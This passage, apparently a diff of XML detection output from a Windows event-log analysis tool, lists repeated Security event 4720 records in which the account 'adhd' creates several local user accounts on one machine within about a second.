-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.6236986Z'/&gt;&lt;EventRecordID&gt;4393&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brian&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1058&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brian&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brian</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4387</recordid>
-            <time>2020-06-11 22:04:56.541707800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.5417078Z'/&gt;&lt;EventRecordID&gt;4387&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Vincent&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1057&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Vincent&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Vincent</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4381</recordid>
-            <time>2020-06-11 22:04:56.451013000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.4510130Z'/&gt;&lt;EventRecordID&gt;4381&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Larry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1056&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Larry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Larry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4375</recordid>
-            <time>2020-06-11 22:04:56.366306300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.3663063Z'/&gt;&lt;EventRecordID&gt;4375&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Julie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1055&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Julie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Julie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4369</recordid>
-            <time>2020-06-11 22:04:56.277532100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.2775321Z'/&gt;&lt;EventRecordID&gt;4369&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Bruce&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1054&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Bruce&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Bruce</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4363</recordid>
-            <time>2020-06-11 22:04:56.170628400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.1706284Z'/&gt;&lt;EventRecordID&gt;4363&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Louis&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1053&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Louis&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Louis</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4357</recordid>
-            <time>2020-06-11 22:04:56.37053600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.0370536Z'/&gt;&lt;EventRecordID&gt;4357&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Maria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1052&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Maria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Maria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4351</recordid>
-            <time>2020-06-11 22:04:55.956762300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.9567623Z'/&gt;&lt;EventRecordID&gt;4351&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Margaret&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1051&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Margaret&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Margaret</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4345</recordid>
-            <time>2020-06-11 22:04:55.879514700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:55.8795147Z'/&gt;&lt;EventRecordID&gt;4345&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Emma&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1050&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Emma&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Emma</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4339</recordid>
-            <time>2020-06-11 22:04:55.788962000Z</time>
-            <channel>Security</channel>
